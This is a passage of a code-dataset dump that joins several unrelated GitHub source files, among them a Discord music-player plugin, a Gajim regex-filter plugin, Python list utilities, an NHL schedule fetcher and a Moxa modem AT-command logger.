Please see \"\n \"`{}help playlist configure` for more information.\".format(\n utilities.get_invoker(bot, guild=context.guild)))\n if channel_restriction_id != context.channel.id:\n channel_restriction = data.get_channel(bot, channel_restriction_id, guild=context.guild)\n raise CBException(\n \"The music player must be used in the assigned text channel, {}.\".format(\n channel_restriction.mention))\n\n # Voice channel checks\n if not context.author.voice:\n raise CBException(\n \"You must be in a voice channel to use the player.\", autodelete=autodelete)\n voice_channel = context.author.voice.channel\n if use_player_interface and music_player.voice_channel != voice_channel:\n raise CBException(\n \"You must be in the same voice channel as the bot.\", autodelete=autodelete)\n elif use_player_interface and music_player.state == States.LOADING:\n raise CBException(\"Playlist is loading, please wait.\", autodelete=autodelete)\n\n\nasync def control_player(bot, context):\n \"\"\"Basic control of the player (like pausing/stopping/skipping etc.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n if len(context.options) != 2:\n raise CBException(\"Only one action must be provided.\", autodelete=autodelete)\n if not use_player_interface:\n raise CBException(\"The music player is not active.\")\n await _check_player_restrictions(bot, context, music_player, use_player_interface, autodelete)\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n permissions = music_player.control == Control.ALL or is_dj\n\n try:\n action = \"[Unknown]\"\n if 'next' in context.options or 'skip' in context.options:\n action = 'skip the current track'\n assert permissions or music_player.control == Control.PARTIAL\n result = await music_player.track_navigate(True, context.author)\n if not result: # Add to vote skip list instead\n if (music_player.state == States.PLAYING and\n context.author.id not in music_player.skip_voters):\n action += '. 
Voting to skip instead'\n music_player.skip_voters.append(context.author.id)\n music_player.update_listeners()\n assert False\n elif 'resume' in context.options:\n action = 'resume the player'\n assert permissions or music_player.autopaused or music_player.first_time_startup\n asyncio.ensure_future(music_player.play(author=context.author))\n else:\n if 'pause' in context.options:\n action = 'pause the player'\n assert permissions\n asyncio.ensure_future(music_player.pause(author=context.author))\n elif 'stop' in context.options:\n action = 'stop the player'\n assert permissions\n asyncio.ensure_future(music_player.stop(\n text=\"The player has been stopped by {}.\".format(context.author.mention)))\n elif 'previous' in context.options:\n action = 'skip to the previous track'\n assert permissions\n asyncio.ensure_future(music_player.track_navigate(False, context.author))\n except AssertionError:\n raise CBException(\n \"You have insufficient permissions to {}.\".format(action),\n autodelete=autodelete)\n\n # Delete message\n return Response(message_type=MessageTypes.REPLACE, extra=1)\n\n\nasync def setup_player(bot, context):\n \"\"\"Starts the player interface and starts playing a track if selected.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n await _check_player_restrictions(bot, context, music_player, use_player_interface, autodelete)\n\n use_play_command = context.subcommand.id == 'play'\n if use_play_command and (context.arguments[0] and 'track' in context.options):\n raise CBException(\n \"Cannot supply the track and query parameters at the same time.\",\n autodelete=autodelete)\n\n # Check the given track index, if one was provided\n # Get mode from persistent data because the player may not exist yet\n track_index = None\n track = None\n adding_track = False\n if use_play_command:\n if 'track' in context.options: # Play track index\n track_index = context.options['track']\n tracklist = _get_tracklist(bot, context.guild)\n if not 0 < track_index <= len(tracklist):\n raise CBException(\n \"Track index must be between 1 and {} inclusive.\".format(len(tracklist)),\n autodelete=autodelete)\n track_index -= 1\n track = tracklist[track_index]\n elif context.arguments[0]: # Query given (add track)\n adding_track = True\n add_track_response = await add_track(bot, context)\n await bot.handle_response(context.message, add_track_response, context=context)\n await _check_player_restrictions(\n bot, context, music_player, use_player_interface, autodelete\n )\n\n # Check autoplay permissions\n use_autoplay = False\n if use_play_command:\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n control_type = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n use_autoplay = (\n control_type == Control.ALL or is_dj or\n (control_type == Control.PARTIAL and\n (not music_player or music_player.first_time_startup)))\n\n # Setup new player\n if music_player is None or music_player.state == States.STOPPED:\n logger.debug(\"Creating new music player.\")\n music_player = MusicPlayer(\n bot, context.message, autoplay=use_autoplay, track_index=track_index)\n data.add(\n bot, __name__, 'music_player', music_player, guild_id=context.guild.id, volatile=True)\n\n # Update player message or change tracks\n else:\n if use_autoplay and track_index is not None:\n music_player.notification = '{} skipped to {}'.format(\n context.author.mention, _build_track_details(bot, track, track_index))\n\n play_track = bool(\n 
use_autoplay and (music_player.state == States.PAUSED or track_index is not None))\n\n # Check if messages can just be replaced\n message_history = await context.channel.history(limit=3).flatten()\n message_ids = list(it.id for it in message_history)\n if (len(message_history) > 2 and music_player.message.id in message_ids and\n not context.subcommand.id == 'show'):\n if play_track:\n asyncio.ensure_future(music_player.play(\n track_index=track_index, author=context.author))\n\n else:\n await music_player.set_new_message(\n context.message, autoplay=use_autoplay if play_track else None,\n track_index=track_index)\n\n # Delete any immediate play/skip commands, but keep track add messages.\n if not adding_track:\n return Response(message_type=MessageTypes.REPLACE)\n","repo_name":"jkchen2/JshBot-plugins","sub_path":"playlist/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":100715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31971153432","text":"from django.urls import path, include\nfrom agenda import views\n\napp_name = 'agenda'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('autocadastro/', views.autocadastro, name='autocadastro'),\n path('minhas_vacinas/', views.minhas_vacinas, name='minhas_vacinas'),\n path(r'campanhas/', include([\n path('', views.campanhas, name='campanhas'),\n path('', views.detalhar_campanha, name='detalhar_campanha'),\n path('/editar/', views.editar_campanha, name='editar_campanha'),\n path('cadastrar/', views.cadastrar_campanha, name='cadastrar_campanha'),\n ])),\n path(r'agendar_vacinacao/', include([\n path('/', views.agendar_vacinacao_estabelecimento, name='agendar_vacinacao_estabelecimento'),\n path('//', views.agendar_vacinacao_data, name='agendar_vacinacao_data'),\n ])),\n \n path(r'acompanhar_vacinacao/', include([\n path('/fila/', views.fila, name='fila'),\n ])),\n \n path('/confirmar_vacinacao/', views.confirmar_vacinacao, name='confirmar_vacinacao'),\n path('cadastrar_vacina_privada/', views.cadastrar_vacina_privada, name='cadastrar_vacina_privada')\n\n]\n","repo_name":"Trunkol/imunizow","sub_path":"agenda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74995098616","text":"import re\n\nfrom plugins import GajimPlugin\nfrom plugins.helpers import log, log_calls\n\nfrom common import gajim\nfrom common import ged\nfrom command_system.framework import CommandContainer, command, doc\nfrom command_system.implementation.hosts import *\n\nclass RegexFilterPlugin(GajimPlugin):\n\n @log_calls('RegexFilterPlugin')\n def init(self):\n self.config_dialog = None\n\n self.events_handlers = {\n 'decrypted-message-received': (ged.PREGUI1,\n self._nec_decrypted_message_received),\n 'gc-message-received': (ged.PREGUI1, self._nec_gc_message_received),\n }\n\n self.create_rules()\n\n @log_calls('RegexFilterPlugin')\n def activate(self):\n FilterCommands.enable()\n\n @log_calls('RegexFilterPlugin')\n def deactivate(self):\n FilterCommands.disable()\n\n @log_calls('RegexFilterPlugin')\n def create_rules(self):\n self.rules = {}\n for num, c in self.config.items():\n self.rules[int(num)] = [re.compile(c[0], re.MULTILINE), c[1]]\n\n @log_calls('RegexFilterPlugin')\n def add_rule(self, search, replace):\n if self.rules:\n num = max(self.rules.keys()) + 1\n else:\n num = 0\n self.config[str(num)] = [search, replace]\n 
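# Recompile the cached regex rules so the new entry takes effect immediately\n 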
self.create_rules()\n\n @log_calls('RegexFilterPlugin')\n def remove_rule(self, num):\n if num in self.config:\n del self.config[num]\n self.create_rules()\n return True\n return False\n\n @log_calls('RegexFilterPlugin')\n def get_rules(self):\n return self.config\n\n @log_calls('RegexFilterPlugin')\n def _nec_all(self, obj):\n if not obj.msgtxt:\n return\n for num in sorted(self.rules.keys()):\n rule = self.rules[num]\n obj.msgtxt = rule[0].sub(rule[1], obj.msgtxt)\n\n @log_calls('RegexFilterPlugin')\n def _nec_decrypted_message_received(self, obj):\n self._nec_all(obj)\n\n @log_calls('RegexFilterPlugin')\n def _nec_gc_message_received(self, obj):\n self._nec_all(obj)\n\nclass FilterCommands(CommandContainer):\n AUTOMATIC = False\n HOSTS = ChatCommands, PrivateChatCommands, GroupChatCommands\n\n @command(\"add_filter\", raw=True)\n @doc(_(\"Add an incoming filter. First argument is the search regex, \"\n \"second argument is the replace regex.\"))\n def add_filter(self, search, replace):\n plugin = gajim.plugin_manager.get_active_plugin('regex_filter')\n plugin.add_rule(search, replace)\n return _('Added rule to replace %s by %s') % (search, replace)\n\n @command(\"remove_filter\", raw=True)\n @doc(_(\"Remove an incoming filter. Argument is the rule number. \"\n \"See /list_rules command.\"))\n def remove_filter(self, num):\n plugin = gajim.plugin_manager.get_active_plugin('regex_filter')\n if plugin.remove_rule(num):\n return _('Rule number %s removed') % num\n return _('Rule number %s does not exist') % num\n\n @command(\"list_filters\")\n @doc(_(\"List incoming filters.\"))\n def list_filters(self):\n plugin = gajim.plugin_manager.get_active_plugin('regex_filter')\n rules = plugin.get_rules()\n st = ''\n for num, rule in rules.items():\n st += _('%(num)s: %(search)s -> %(replace)s') % {'num': num,\n 'search': rule[0], 'replace': rule[1]} + '\\n'\n if st:\n return st[:-1]\n else:\n return _('No rule defined')\n","repo_name":"lheckemann/gajim-plugins","sub_path":"regex_filter/regex_filter.py","file_name":"regex_filter.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5369624986","text":"import os\n\ndef Creation(Company, Reset):\n for comp in Company:\n if (not os.path.isfile(comp+\"_Bench\")) or Reset:\n f = open(comp+\"_Bench\",\"w+\")\n f.write(\"1970-01-01T00:00:00#0\\n\") # Store Total Change\n f.write(\"1970-01-01T00:00:00#0\\n\") # Store Bench Date\n f.write(\"1970-01-01T00:00:00#0\\n\") # Store Current Date\n f.close()\n\n if (not os.path.isfile(comp+\"_Trend\")) or Reset:\n f = open(comp+\"_Trend\",\"w+\")\n f.close()\n\n return 0\n","repo_name":"Jokezor/TheTrendingGroup","sub_path":"Scripts/Create_files.py","file_name":"Create_files.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"28548526644","text":"class Utility:\n\tdef pos_none_in_list(self, l):\n\t\t\n\t\t\"\"\"take a list of values and return the position numbers of the values\n\t\tequal to 'None'\"\"\"\n\t\tself.list = l\n\t\tl2=[]\n\t\tfor i in range(len(self.list)):\n\t\t\tif self.list[i] == 'None':\n\t\t\t\tl2.append(i)\n\t\tfor i in l2:\n\t\t\tself.list[i] = None\n\n\t\treturn self.list\n\t\n\tdef tup_2_list(self, t, s='', i=0):\n\t\t\n\t\t\"\"\"take a tuple of strings, and return a list of lists of the values.\n\t\tif s is set, add the value to the strings. 
If i is set return only the\n\t\tvalue in the i position\"\"\"\n\t\tself.tupla = t\n\t\tself.index = i\n\t\tself.subfix = s\n\t\tl = []\n\t\tfor n in range(len(self.tupla)):\n\t\t\ttry:\n\t\t\t\tint(self.tupla[n][self.index])\n\t\t\texcept ValueError:\n\t\t\t\tv = [self.subfix + self.tupla[n][self.index]]\n\t\t\telse:\n\t\t\t\tv = [self.subfix + str(self.tupla[n][self.index])]\n\t\t\tl.append(v)\n\t\treturn l\n\t\n\tdef tup_2_list_II(self, l):\n\t\t\"\"\"take a list of tuples and return a list of lists\"\"\"\n\t\tself.list = l\n\t\tl = []\n\t\tfor i in self.list:\n\t\t\tsublist=[]\n\t\t\tfor n in i:\n\t\t\t\tsublist.append(n)\n\t\t\tl.append(sublist)\n\t\treturn l\n\n\tdef tup_2_list_III(self, l):\n\t\t\"\"\"take a list of tuples and return a list of values\"\"\"\n\t\tself.list = l\n\t\tnl = []\n\t\tfor i in self.list:\n\t\t\tnl.append(i[0])\n\t\treturn nl\n\n\tdef list_tup_2_list(self, l):\n\t\t\"\"\"take a list of tuples and return a list of lists\"\"\"\n\t\tself.list = l\n\t\tres_list = []\n\t\tfor i in self.list:\n\t\t\tres_list.append(i[0])\n\t\treturn res_list\n\n\tdef select_in_list(self,l,p):\n\t\t\"\"\"take a list of lists (or a flat list) and return, as a list of\n\t\tlists, the value found at position p of each sublist (or of the\n\t\tflat list itself).\"\"\"\n\t\tself.list = l\n\t\tself.pos = p\n\t\tres_list = []\n\t\tfor i in self.list:\n\t\t\tif type(i) is list:\n\t\t\t\tpar_tup = i\n\t\t\t\tres_list.append([par_tup[self.pos]])\n\t\t\telse:\n\t\t\t\tres_list.append([self.list[self.pos]])\n\t\t\t\t\n\t\t\t\tbreak\n\t\treturn res_list\n\n\n\tdef count_list_eq_v(self, l, v):\n\t\t\"\"\"take a list and a value. If the number of occurrences of an\n\t\titem inside the list is equal to v, put the single value\n\t\tinto list_res as a list. Return a list of lists\"\"\"\n\n\t\tself.list = l\n\t\tself.value = v\n\t\tlist_res = []\n\t\tfor i in self.list:\n\t\t\tif self.list.count(i) == self.value:\n\t\t\t\tlist_res.append([i])\n\t\treturn list_res\n\t\n\tdef find_list_in_dict(self, d):\n\t\t\"\"\"receives a dict and, if it contains a list of lists, deletes\n\t\tthat item from the dict.\n\t\tReturns a tuple containing the new dict and a list of\n\t\ttuples which contain the keys and the values\"\"\"\n\n\t\tself.dict = d\n\t\t##print \"self.dict\", self.dict\n\t\tres_list = []\n\t\tret = []\n\t\t# iterate over a copy of the items so entries can be deleted safely\n\t\tfor key, value in list(self.dict.items()):\n\t\t\tif bool(value) == True:\n\t\t\t\tif type(value[0]) is list:\n\t\t\t\t\tres_list.append((key,value))\n\t\t\t\t\tdel self.dict[key]\n\n\t\tif bool(res_list) == True:\n\t\t\tfor i in res_list:\n\t\t\t\tcont = 0\n\t\t\t\tfor n in range(len(i)):\n\t\t\t\t\t\n\t\t\t\t\ttry:\n\t\t\t\t\t\tret.append((i[0]+str(cont), i[1][cont]))\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\t\tcont +=1\n\t\treturn self.dict, ret\n\n\tdef add_item_to_dict(self,d,i):\n\t\t\"\"\"receive a dict and a list containing (key, value) tuples\n\t\tand add them to the dict\"\"\"\n\t\t\n\t\tself.dict = d\n\t\tself.item = i\n\t\tfor i in self.item:\n\t\t\tself.dict[i[0]] = i[1]\n\t\treturn self.dict\n\n\tdef list_col_index_value(self,v1,v2):\n\t\t\"\"\"compare two lists of the same length and return two lists in one\n\t\ttuple: for every position where v_1 and v_2 differ, the v_2 value\n\t\tis appended to mod_value and its position is appended to list_index.\n\t\t\"\"\"\n\t\tself.v_1=v1\n\t\tself.v_2=v2\n\t\tlist_index = []\n\t\tmod_value = []\n\t\tfor i in range(len(self.v_1)):\n\t\t\tif self.v_1[i] != self.v_2[i]:\n\t\t\t\tmod_value.append(self.v_2[i])\n\t\t\t\tlist_index.append(str(i))\n\t\treturn mod_value, 
list_index\n\n\tdef deunicode_list(self, l):\n\t\tself.list = l\n\t\tfor i in range(len(self.list)):\n\t\t\tif str(type(self.list[i])) != \"<type 'unicode'>\":\n\t\t\t\tif self.list[i] == None:\n\t\t\t\t\tpass\n\t\t\t\telif self.list[i][0:3] == '\"\"\"':\n\t\t\t\t\tself.list[i] = self.list[i][3:-3]\n\t\t\t\telif self.list[i][0:1] == '\"':\n\t\t\t\t\tself.list[i] = self.list[i][1:-1]\n\t\treturn self.list\n\n\n\tdef zip_lists(self,l1,l2):\n\t\tself.l1 = l1\n\t\tself.l2 = l2\n\t\t\n\t\teq_list=zip(l1,l2)\n\t\tlr=[]\n\t\tfor i in eq_list:\n\t\t\tif i[0]==i[1]:\n\t\t\t\tlr.append(i[0])\n\t\t\t\t\n\t\tif bool(lr)==True:\n\t\t\treturn lr\n\n\tdef join_list_if(self,l1,l2,v1,v2):\n\t\tself.l1 = l1\n\t\tself.l2 = l2\n\t\tself.value_pos_1=v1\n\t\tself.value_pos_2=v2\n\t\tr_list=[]\n\t\tfor l1 in self.l1:\n\t\t\tsublist=[]\n\t\t\tfor l2 in self.l2:\n\t\t\t\tif str(type(l1[self.value_pos_1])) != \"<type 'unicode'>\":\n\t\t\t\t\tif l1[self.value_pos_1]==l2[self.value_pos_2]:\n\t\t\t\t\t\tsublist+=l2[self.value_pos_2+1:]\n\t\t\t\t\telse:\n\t\t\t\t\t\tif l1[self.value_pos_1].strip()==l2[self.value_pos_2]:\n\t\t\t\t\t\t\tsublist+=l2[self.value_pos_2+1:]\n\t\t\t\t\t\t\n\t\t\tif bool(sublist) == True:\n\t\t\t\tr_list.append(l1+sublist)\n\t\t\t\t\t\n\t\tif bool(r_list) == True:\n\t\t\treturn r_list\n\n\tdef extract_from_list(self, l, p):\n\t\tself.list = l\n\t\tself.pos = p\n\t\tres_list = []\n\t\tfor i in self.list:\n\t\t\tres_list.append([i[self.pos]])\n\t\treturn res_list\n\n\tdef remove_empty_items_fr_dict(self,d):\n\t\t# iterate over a copy of the items so entries can be removed safely\n\t\tfor k, v in list(d.items()):\n\t\t\tif v == \"\" or v == \"''\" or v == '\"\"' or v == None:\n\t\t\t\td.pop(k)\n\t\treturn d\n\n\tdef findFieldFrDict(self, d, fn):\n\t\t\"\"\"return the key of d whose value equals fn, or None if there is no match\"\"\"\n\t\tself.dict = d\n\t\tself.field_name = fn\n\t\tfor i in self.dict:\n\t\t\tif self.dict[i] == self.field_name:\n\t\t\t\treturn i\n\t\treturn None\n\n\n\n#print dir(Utility())\n#Samples - uncomment and run the module to view the functions\n#u = Utility()\n#print u.findFieldFrDict((2))\n#print \"----------tup_to_list--------------\"\n#print \"\"\n#print u.tup_2_list((\"a\", \"b\", \"c\"))\n###print \"\"\n#print u.tup_2_list((\"a\", \"b\", \"c\"), \"lettera: \")\n###print \"\"\n# u.tup_2_list( ((\"a\", \"b\"), (\"c\", \"d\")), \"\", 1)\n###print \"\"\n###print \"----------\n###print \"\"\n###print \"----------tup_to_list_II--------------\"\n###print \"\"\n#print u.list_tup_2_list([(1, ), (2, ), (\"dssa\", )])\n##print u.tup_2_list_II([[\"a\", \"b\", \"c\"]])\n###print \"\"\n###print \"\"\n###print \"----------\n###print u.select_in_list([12, 5, 7, 3, 3], 1)\n###print \"\"\n###print u.select_in_list([[12, 5], [7, 3, 3]], 0)\n###print \"\"\n###print \"----------pos_in_list------------------------\"\n###print \"\"\n##print u.pos_in_list([\"\", '', 7, 'None', 3])\n##print u.pos_none_in_list(['None', '', 7, 'None', 3])\n###print \"\"\n###print \"----------count_list_eq_v--------------------\"\n###print \"\"\n###print u.count_list_eq_v([12, 34, 78, 34, 12, \"a\", \"b\", \"a\"], 2)\n###print \"\"\n###print \"----------find_list_in_dict------------------\"\n###print \"\"\n###print u.find_list_in_dict({\"a\": [\"1\"], \"b\": [[12, 34]], \"c\": (1, 2, 3)})\n###print \"\"\n###print \"----------add_item_to_dict------------------\"\n###print \"\"\n#print u.add_item_to_dict( {\"a\": [1, 2, 3]}, [(\"b\", [4, 5, 6]), (\"c\",2)] )\n###print \"\"\n###print \"----------list_col_index_value------------------\"\n###print \"\"\n###print u.list_col_index_value([1, 2, 3, 4, \"a\", \"b\"], [5, 2, 7, 8, \"a\", \"d\"])\n###print \"\"\n###print 
\"----------deunicode_list------------------\"\n###print \"\"\n#print u.deunicode_list([u'\"1\"', u'\"2\"', u'\"\"\"b\"\"\"'])\n###print \"\"\n##print \"----------zip_lists------------------\"\n##print \"\"\n##print u.zip_lists([\"a\", \"b\", \"c\", 1, 3], [\"a\", \"b\", \"c\", 1, \"r\"])\n###print \"\"\n###print \"----------join_list_if------------------\"\n###print \"\"\n###print u.join_list_if([[1, \"b\", \"c\"], [\"d\", \"c\", \"e\"], [\"r\", \"d\", \"c\"]], [[\"1\", \"4\", \"2\"], [\"3\", \"b\", \"b\"], [\"a\", \"c\", \"6\"]],2,1)\n###print \"\"\n###print \"----------extract_from_list------------------\"\n###print \"\"\n###print u.extract_from_list([[1, 2, 3], [4, 5, 6]], 1)\n\n\n","repo_name":"lucaarcteam/qgis-archeos-plugin","sub_path":"debian/usr/share/archeos/qgis_archeos_plugin-0.1/python/plugins/pyarchinit/modules/db/pyarchinit_utility.py","file_name":"pyarchinit_utility.py","file_ext":"py","file_size_in_byte":7272,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"1121856925","text":"def pos_neg(value1, value2, negative):\n '''\n To define the function 'pos_neg' with 2 arguments in one parameter\n ''' \n if value1 >= 0 and value2 <= 0 and negative == False: # if value1 is positive, value 2 is negative and negative is false\n return True \n elif value1 <= 0 and value2 >= 0 and negative == False: # if value1 is negative, value2 is postive and negative is false\n return True\n elif value1 <= 0 and value2 <= 0 and negative == True: # if both are negative and negative is true \n return True\n else:\n return False\n\nprint(pos_neg(-1, 1, False)) # To print to call the function 'pos_neg'","repo_name":"Zasterify/Python-Practice","sub_path":"Example Problems/posit and negat.py","file_name":"posit and negat.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2639094762","text":"import os, sys, inspect\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pathlib\n\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nfrom utils.color_print import ColorPrint\n\n\ndef __visualize(df, base_list, param_list, cond_list, base_col, param_col, cond_col, tps_col, plt_title, plt_name):\n # plt.figure()\n \n for n in base_list:\n for m in cond_list:\n # if not (abs(m) <= 1e-4 or abs(m - 0.7) <= 1e-4):\n # continue\n \n rows = df.loc[(df[base_col] == n) & (df[cond_col] == m)]\n rows = rows.sort_values(param_col)\n x = rows[param_col]\n y = rows[tps_col]\n \n plt.xlabel(param_col)\n plt.ylabel(tps_col)\n plt.title(f'{plt_title} for {base_col} = {n}')\n plt.plot(x, y, marker=\"o\")\n\n # plt.grid()\n plt.savefig(f\"{plt_name}_{base_col}={n}_{cond_col}={m}.png\")\n plt.figure()\n\n ColorPrint.print_info(f\"[Info]: Saving plot for {plt_title} for {base_col} = {n} and {cond_col}={m}\")\n \n plt.legend(cond_list, loc='best', title=cond_col)\n # plt.legend([0.0, 0.7], loc='best', title=cond_col)\n plt.grid(axis='y')\n # plt.savefig(f\"{plt_name}_{base_col}={n}.png\")\n # plt.show()\n \n\ndef visualize(filename, dir_name):\n df = pd.read_csv(filename)\n num_nodes = sorted(df['Number of nodes'].unique())\n cross_shard_tx_ratio = sorted(df['Fraction of cross-shard tx'].unique())\n num_shards = sorted(df['Number of shards'].unique())\n\n plt_name = f\"{dir_name}/shardsVsTPS\"\n __visualize(df, num_nodes, num_shards, 
cross_shard_tx_ratio, 'Number of nodes', 'Number of shards', \\\n 'Fraction of cross-shard tx', 'Processed TPS', 'Processed TPS vs Number of Shards', plt_name)\n\n plt_name = f\"{dir_name}/txRatioVsTPS\"\n __visualize(df, num_nodes, cross_shard_tx_ratio, num_shards, 'Number of nodes', 'Fraction of cross-shard tx', \\\n 'Number of shards', 'Processed TPS', 'fraction of cross-shard tx vs TPS', plt_name)\n \n\ndef main():\n if len(sys.argv) == 1:\n ColorPrint.print_fail(f\"\\n[Error]: log file not specified\")\n exit(1)\n\n filename = sys.argv[1]\n parent_dir_name = f\"logs_data/plots/{pathlib.PurePath(filename).parent.name}\"\n exact_filename = pathlib.PurePath(filename).name\n dir_name = f\"{parent_dir_name}/{exact_filename[:exact_filename.find('_')]}\"\n \n if not os.path.exists(dir_name):\n ColorPrint.print_info(f\"[Info]: Creating directory '{dir_name}' for storing plots\")\n pathlib.Path(dir_name).mkdir(parents=True, exist_ok=True)\n \n visualize(filename, dir_name)\n print(\"\\n\")\n\n\nif __name__==\"__main__\":\n main()","repo_name":"vishishtpriyadarshi/ShardEval","sub_path":"analyzer/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"22"} +{"seq_id":"39054773387","text":"from datetime import datetime\nfrom urllib import parse\nfrom requests import Response, get\n\nfrom shared_items.utils import pp, measure_execution, try_it\nfrom constants import TAB\n\nfrom models.nhl import LeagueBroadcastSchedule, Game as LeagueGame\nfrom models.nhl_espn import DailyEspnPlusNhlSchedule, Event as PowerPlayGame\nfrom shared import ElligibleSportsEnum, NotionSportsScheduleItem, log_good_networks\nfrom utils import NotionScheduler\nfrom utils.assemblers import NhlAssembler, NhlEspnPlusAssembler\n\n\ndef assemble_league_schedule_url() -> str:\n todays_date = datetime.today().strftime(\"%Y-%m-%d\")\n return f\"https://api-web.nhle.com/v1/schedule/{todays_date}\"\n\n\ndef assemble_power_play_schedule_url() -> str:\n power_play_schedule_base_url = (\n \"https://site.web.api.espn.com/apis/v2/scoreboard/header?\"\n )\n power_play_schedule_params = (\n (\"sport\", \"hockey\"),\n (\"league\", \"nhl\"),\n (\"region\", \"us\"),\n (\"lang\", \"en\"),\n (\"contentorigin\", \"espn\"),\n (\"buyWindow\", \"1m\"),\n (\"showAirings\", \"buy,live,replay\"),\n (\"showZipLookup\", \"true\"),\n (\"tz\", \"America/Indianapolis\"),\n )\n return power_play_schedule_base_url + parse.urlencode(power_play_schedule_params)\n\n\n@measure_execution(f\"{TAB}fetching new NHL schedule\")\ndef fetch_schedule_json() -> dict:\n url = assemble_league_schedule_url()\n schedule_response: Response = get(url)\n return schedule_response.json()\n\n\n@measure_execution(f\"{TAB}fetching new NHL PowerPlay schedule\")\ndef fetch_power_play_json() -> dict:\n url = assemble_power_play_schedule_url()\n power_play_schedule_response: Response = get(url)\n return power_play_schedule_response.json()\n\n\ndef assemble_usable_events(schedule_json: dict) -> list[LeagueGame]:\n league_broadcast_schedule = LeagueBroadcastSchedule(**schedule_json)\n return league_broadcast_schedule.usable_events()\n\n\ndef assemble_usable_power_play_games(\n power_play_schedule_json: dict,\n) -> list[PowerPlayGame]:\n power_play_nhl_schedule = DailyEspnPlusNhlSchedule(**power_play_schedule_json)\n return power_play_nhl_schedule.usable_events()\n\n\ndef assemble_notion_items(\n league_games: list[LeagueGame], power_play_games: list[PowerPlayGame]\n) 
-> list[NotionSportsScheduleItem]:\n # today = datetime.combine(datetime.today(), datetime.min.time()).astimezone()\n\n assembled_items = [\n NhlAssembler(game).notion_sports_schedule_item()\n for game in league_games\n if game.gameState in [\"LIVE\", \"FUT\"]\n ]\n assembled_power_play_items = [\n NhlEspnPlusAssembler(game).notion_sports_schedule_item()\n for game in power_play_games\n ]\n return sorted(assembled_items + assembled_power_play_items, key=lambda x: x.date)\n\n\n@try_it\ndef schedule_nhl():\n schedule_json = fetch_schedule_json()\n power_play_schedule_json = fetch_power_play_json()\n usable_events = assemble_usable_events(schedule_json)\n usable_power_play_games = assemble_usable_power_play_games(power_play_schedule_json)\n combined_items = assemble_notion_items(usable_events, usable_power_play_games)\n\n log_good_networks(combined_items)\n\n NotionScheduler(ElligibleSportsEnum.NHL.value, combined_items).schedule()\n\n\nif __name__ == \"__main__\":\n schedule_nhl()\n","repo_name":"marker004/notion-sports-schedules","sub_path":"app/nhl_schedule.py","file_name":"nhl_schedule.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"18500252134","text":"\"\"\"\nThis code uses Moxa device AT commands to select the preferred band and to record cell information.\n\"\"\"\nimport os\nfrom subprocess import PIPE, run\nimport time\nimport datetime as dt\ndef out(command):\n result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)\n return result.stdout\n\n\n# select preferred band. select LTE or NR\ndef init():\n z = out(r\"mxat -d /dev/ttyUSB2 -c ATE1\")\n print(z)\n z = out(r\"mxat -d /dev/ttyUSB2 -c AT+QNWPREFCFG=\\\"nsa_nr5g_band\\\"\")\n print(z)\n # z = out(r\"mxat -d /dev/ttyUSB2 -c AT+QNWPREFCFG=\\\"lte_band\\\",28\")\n print(z)\n\n\n# record the timing and cell information\ndef record():\n f1 = open(\"enable\")\n n = 0\n t = dt.datetime.today()\n w = '-'.join([str(x) for x in [t.year, t.month, t.day, t.hour, t.minute, t.second]])\n f = open('./device_log/log_'+w, 'a')\n while f1.readline() == 'true\\n':\n if n % 10 == 0:\n print(\"recording...\")\n f.write('time,'+str(dt.datetime.today())+ '\\n')\n z = out(r\"mxat -d /dev/ttyUSB2 -c at+qeng=\\\"servingcell\\\"\")\n f.write(z)\n z = out(r\"mxat -d /dev/ttyUSB2 -c at+qeng=\\\"neighbourcell\\\"\")\n f.write(z)\n n += 1\n# time.sleep(0.1)\n f1 = open(\"enable\")\n\n","repo_name":"Jackbedford0428/wmnl-handoff-research","sub_path":"others/handoff_study-main/moxa_device/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11762514984","text":"from pathlib import Path\n\nimport numpy\n\nfrom seqvec_search import mmseqs\nfrom seqvec_search.data import LoadedData\nfrom seqvec_search.main import faiss_search, evaluate_faiss, evaluate\n\n\ndef test_search_ann():\n data = LoadedData.from_options(path=Path(\"test-data/small-random\"), hits=5)\n queries = numpy.load(str(data.test))\n results, scores, search_time = faiss_search(\n numpy.load(str(data.train)), queries, data.hits\n )\n auc1s, tps = evaluate_faiss(data, results)\n assert auc1s == [1.0, 1 / 3, 2 / 3, 0.0, 0.0, 1 / 3]\n assert tps == [1.0, 2 / 3, 2 / 3, 1.0, 1.0, 1.0]\n\n\ndef test_ann_alignment():\n data = LoadedData.from_options(path=Path(\"test-data/pfam-20-10\"), hits=10)\n queries = 